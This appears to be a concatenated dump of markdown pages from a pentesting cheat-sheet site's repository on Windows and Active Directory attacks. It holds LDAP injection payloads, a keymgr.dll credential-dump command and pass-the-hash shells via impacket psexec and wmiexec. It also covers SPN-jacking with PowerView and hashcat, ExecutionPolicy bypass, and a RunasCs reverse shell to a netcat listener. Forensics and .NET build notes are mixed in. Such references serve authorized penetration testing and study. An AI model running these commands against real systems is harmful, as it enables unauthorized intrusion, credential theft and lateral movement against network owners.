-------------------------------------------------------------------------------- /src/exploit/windows/active-directory/ldap-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LDAP Injection 3 | description: LDAP may be vulnerable to query injection if website does not properly validate user input. 4 | tags: 5 | - Active Directory 6 | - Web 7 | - Windows 8 | refs: 9 | - https://infosecwriteups.com/for-newbies-simple-examples-of-ldap-injection-vulnerabilities-cbf231431923 10 | date: 2023-09-22 11 | draft: false 12 | --- 13 | 14 | ## Basic Payloads 15 | 16 | ```bash 17 | (&uid=*)(userPassword=*) 18 | (&uid=*)|(userPassword=*) 19 | (&uid=*)|(objectClass=*)(userPassword=password123) 20 | 21 | *)(uid=*))(|(password=*) 22 | ``` 23 | -------------------------------------------------------------------------------- /src/exploit/windows/active-directory/netlogon-elevasion.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Netlogon Elevasion 3 | description: It is a vulnerability to elevate of privilege in Windows Netlogon using the Netlogon Remote Protocol (MS-NRPC). It’s called Zerologon (CVE-2020-1472). 4 | tags: 5 | - Active Directory 6 | - Windows 7 | refs: 8 | date: 2025-04-19 9 | draft: false 10 | --- 11 | 12 | ## Exploitation 13 | 14 | There is a lot of Poc in online. 15 | Here, we’ll use [this repository](https://github.com/dirkjanm/CVE-2020-1472) from GitHub. -------------------------------------------------------------------------------- /src/exploit/windows/dotnet/_data.yml: -------------------------------------------------------------------------------- 1 | category2: dotnet -------------------------------------------------------------------------------- /src/exploit/windows/dotnet/index.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: .NET 3 | description: .NET is an application development environment. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2024-07-17 8 | draft: false 9 | --- 10 | 11 | ## Create a .NET Project from Command Line 12 | 13 | ```bash 14 | # Create a new solution file 15 | # -n: The name for the output being created 16 | dotnet new sln -n test 17 | 18 | # Create a new .NET project. 19 | # console: Use a template for creating a console application. 20 | dotnet new console -n test 21 | 22 | # Add the project to a solution file. 23 | dotnet sln add test/test.csproj 24 | ``` 25 | 26 | ### Build/Run 27 | 28 | To build and run the project, run the following command in the project directory: 29 | 30 | ```csharp 31 | dotnet build 32 | dotnet run 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/windows/forensics/_data.yml: -------------------------------------------------------------------------------- 1 | category2: forensics -------------------------------------------------------------------------------- /src/exploit/windows/forensics/reading-onedrive-logs.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Reading OneDrive Logs 3 | description: OneDrive log files can be read by deobfuscating. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2023-08-18 8 | draft: false 9 | --- 10 | 11 | ## Deobfuscating Log Files 12 | 13 | To read OneDrive logs, we need to deobfuscate log files (**`.odl`, `.odlsent`, `.odlgz`**). 14 | These logs are located in the following on **Windows**: 15 | 16 | - `C:\Users\\AppData\Local\Microsoft\OneDrive\logs\Personal\` 17 | - `C:\Users\\AppData\Local\Microsoft\OneDrive\logs\Business1\` 18 | 19 | [This repository](https://github.com/ydkhatri/OneDrive) is useful to deobfuscate OneDrive logs. 20 | 21 | ```bash 22 | python -m venv venv 23 | # on Windows 24 | .\venv\Scripts\activate 25 | pip install construct pycryptodome 26 | python odl.py -o .\output.csv c:\Users\\AppData\Local\Microsoft\OneDrive\logs\Personal\ 27 | ``` 28 | 29 | After that, we can read the output file (`output.csv`) with tools such as VS Code and Excel. 30 | This file contains sensitive information such as OneDrive account email, access token, etc. -------------------------------------------------------------------------------- /src/exploit/windows/forensics/windows-xml-eventLog.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Windows XML EventLog (EVTX) 3 | description: EVTX is used for Microsoft Windows to store system log information. 4 | tags: 5 | - Forensics 6 | - Windows 7 | refs: 8 | date: 2023-03-26 9 | draft: false 10 | --- 11 | 12 | ## Read EVTX in Linux 13 | 14 | We can parse **`.evtx`** file in Linux using [evtx_dump](https://github.com/omerbenamram/evtx). 15 | 16 | ```bash 17 | wget https://github.com/omerbenamram/evtx/releases/download/v0.8.1/evtx_dump-v0.8.1-x86_64-unknown-linux-gnu -O evtx_dump 18 | chmod +x evtx_dump 19 | ./evtx_dump example.evtx > parsed.txt 20 | ``` 21 | 22 | Now we can find sensitive information from the parsed text. 23 | 24 | ```bash 25 | grep -i TargetUserName parsed.txt 26 | grep -i TargetDomainName parsed.txt 27 | ``` 28 | 29 |
30 | 31 | ## Search Suspicious Activity in EVTX 32 | 33 | [Chainsaw](https://github.com/WithSecureLabs/chainsaw) is a command-line tool to rapidly search and hunt through Windows Forensics Artifacts. 34 | 35 | ```bash 36 | git clone https://github.com/WithSecureLabs/chainsaw.git 37 | cd chainsaw 38 | cargo build --release 39 | ./chainsaw hunt evtx_files/ -s sigma/rules --mapping mapping/sigma-event-logs-all.yml 40 | ``` 41 | -------------------------------------------------------------------------------- /src/exploit/windows/post-exploitation/_data.yml: -------------------------------------------------------------------------------- 1 | caterogy2: post-exploitation -------------------------------------------------------------------------------- /src/exploit/windows/post-exploitation/window-pivoting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Windows Pivoting 3 | description: Accessing obtained over one machine to exploit another machine deeper in the network. 4 | tags: 5 | - Network 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Enumerate Network 12 | 13 | After entering the target server, enumerate and search other networks. 14 | 15 | ### Check the ARP Cache in Target Machine 16 | 17 | ```sh 18 | arp.exe -a 19 | ``` 20 | 21 | ### Check IP Addresses 22 | 23 | ```sh 24 | Get-Content c:\Windows\System32\drivers\etc\hosts 25 | ipconfig /all 26 | ``` 27 | 28 | ### Search Other Network Ranges 29 | 30 | No content yet. -------------------------------------------------------------------------------- /src/exploit/windows/powershell/_data.yml: -------------------------------------------------------------------------------- 1 | category2: powershell -------------------------------------------------------------------------------- /src/exploit/windows/powershell/powershell-executionpolicy-bypass.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PowerShell ExecutionPolicy Bypass 3 | description: 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2024-08-28 8 | draft: false 9 | --- 10 | 11 | ## Method 1. Set-ExecutionPolicy 12 | 13 | By default, the ExecutionPolicy is set to `Restricted`. 14 | 15 | ```bash 16 | Get-ExecutionPolicy 17 | # Restricted 18 | ``` 19 | 20 | To bypass the restriction, run one of the following commands as **Administrator** privilege: 21 | 22 | ```bash 23 | Set-ExecutionPolicy Unrestricted 24 | Set-ExecutionPolicy Bypass 25 | ``` 26 | 27 |
28 | 29 | ## Method 2. Run with `-ExecutionPolicy Bypass` 30 | 31 | ```bash 32 | powershell -noexit -ExecutionPolicy Bypass -File example.ps1 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: privilege-escalation -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/activate-administrator-account-on-windows.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Activate Administrator Account on Windows 3 | description: 4 | tags: 5 | - Privilege Escalation 6 | - Windows 7 | refs: 8 | date: 2024-04-01 9 | draft: false 10 | --- 11 | 12 | Open PowerShell as **Administrator**. 13 | 14 | ```powershell 15 | net user administrator /active:yes 16 | ``` 17 | 18 | Now you can sign in to Administrator account. 19 | 20 | After that, you should disable Administrator account as below: 21 | 22 | ```powershell 23 | net user administrator /active:no 24 | ``` -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/dumping-credentials-with-keymgr-dll.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Dumping Credentials with keymgr.dll 3 | description: The keymgr.dll extracts all credentials on host. 4 | tags: 5 | - Privilege Escalation 6 | - Windows 7 | refs: 8 | - https://samples.vx-underground.org/Papers/Windows/Data%20Theft/2022-04-19%20-%20Dumping%20passwords%20using%20KRShowKeyMgr.PNG 9 | date: 2024-05-17 10 | draft: false 11 | --- 12 | 13 | ## Dump 14 | 15 | ```sh 16 | rundll32 keymgr.dll, KRShowKeyMgr 17 | ``` -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/login-windows-shell.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Login Windows Shell 3 | description: If we have credentials for target Windows system, we can execute commands from Linux machine. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2023-11-11 8 | draft: false 9 | --- 10 | 11 | ## Impacket PsExec 12 | 13 | PsExec gives us an interactive shell on the Windows host. 14 | 15 | ```sh 16 | impacket-psexec username:password@ 17 | # Pass the Hashes 18 | impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1 19 | ``` 20 | 21 |
22 | 23 | ## Impacket WmiExec 24 | 25 | WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host. 26 | 27 | ```sh 28 | impacket-wmiexec example.local/username@10.0.0.1 29 | # Pass the Hashes 30 | impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/spn-jacking.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SPN-Jacking 3 | description: If the current user has a right to write the SPN of another user, we can achieve lateral movement or privilege escalation. 4 | tags: 5 | - Active Directory 6 | - Privilege Escalation 7 | - Windows 8 | refs: 9 | - https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking 10 | date: 2024-10-13 11 | draft: false 12 | --- 13 | 14 | ## Exploit 15 | 16 | ### 1. Set SPN and Get the Hash of the Service Ticket 17 | 18 | ```bash 19 | # 1. Import PowerView module 20 | . .\PowerView.ps1 21 | 22 | # 2. Set SPN 23 | Set-DomainObject -Identity -SET @{serviceprincipalname='evil/evil'} 24 | 25 | # 3. Request sercice ticket 26 | Get-DomainSPNTicket -SPN evil/evil 27 | ``` 28 | 29 | ### 2. Crack the Hash 30 | 31 | After that, we retrieve the hash of the ticket, so crack it on your local machine: 32 | 33 | ```bash 34 | # -m 13100: Replace it with the appropriate number depending on the algorithm. 35 | hashcat -a 0 -m 13100 hash.txt wordlist.txt 36 | ``` 37 | -------------------------------------------------------------------------------- /src/exploit/windows/privilege-escalation/switch-user-on-windows.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Switch User on Windows 3 | description: 4 | tags: 5 | - Privilege Escalation 6 | - Windows 7 | refs: 8 | date: 2024-04-01 9 | draft: false 10 | --- 11 | 12 | ## Runas 13 | 14 | ```bash 15 | runas /user: cmd 16 | runas /user:\ cmd 17 | ``` 18 | 19 |
20 | 21 | ## RunasCS 22 | 23 | We can spawn another shell as another user with [RunasCS](https://github.com/antonioCoco/RunasCs). 24 | First, start a listener on local machine. 25 | 26 | ```bash 27 | nc -lvnp 4444 28 | ``` 29 | 30 | Then execute the following command on target machine. 31 | Replace `10.0.0.1:4444` with your local IP and port. 32 | 33 | ```powershell 34 | RunasCs.exe cmd -r 10.0.0.1:4444 35 | ``` 36 | -------------------------------------------------------------------------------- /src/exploit/windows/protocol/_data.yml: -------------------------------------------------------------------------------- 1 | category2: protocol -------------------------------------------------------------------------------- /src/exploit/windows/service/_data.yml: -------------------------------------------------------------------------------- 1 | category2: service -------------------------------------------------------------------------------- /src/exploit/windows/service/m365-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: M365 (Microsoft Office 365) Pentesting 3 | description: 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2023-09-09 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ### Password Spraying 14 | 15 | We may spray user passwords with open-source tools as below. 16 | 17 | - [MFASweap](https://github.com/dafthack/MFASweep) 18 | - [o365spray](https://github.com/0xZDH/o365spray) 19 | -------------------------------------------------------------------------------- /src/exploit/windows/technique/_data.yml: -------------------------------------------------------------------------------- 1 | category2: technique -------------------------------------------------------------------------------- /src/exploit/windows/technique/download-files-in-windows.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Download Files in Windows 3 | description: We can download files from websites in Windows from command line. 4 | tags: 5 | - Windows 6 | refs: 7 | date: 2024-09-14 8 | draft: false 9 | --- 10 | 11 | ### PowerShell 12 | 13 | ```powershell 14 | wget https://example.com/hello.txt -o hello.txt 15 | # or 16 | Invoke-WebRequest -Uri https://example.com/hello.txt -Outfile .\hello.txt 17 | # or 18 | IWR -Uri https://example.com/hello.txt -Outfile .\hello.txt 19 | ``` 20 | 21 | ### Command Prompt 22 | 23 | We need to call `powershell` or `powershell.exe` command before actual command. 24 | 25 | ```powershell 26 | powershell wget https://example.com/hello.txt -o hello.txt 27 | # or 28 | powershell Invoke-WebRequest -Uri https://example.com/hello.txt -Outfile .\hello.txt 29 | # or 30 | powershell IWR -Uri https://example.com/hello.txt -Outfile .\hello.txt 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/windows/wsl/_data.yml: -------------------------------------------------------------------------------- 1 | category2: wsl -------------------------------------------------------------------------------- /src/support.vto: -------------------------------------------------------------------------------- 1 | --- 2 | layout: layouts/base.vto 3 | bodyClass: body-support 4 | --- 5 | 6 |
7 |
8 | {{ comp.support() }} 9 |
10 |
--------------------------------------------------------------------------------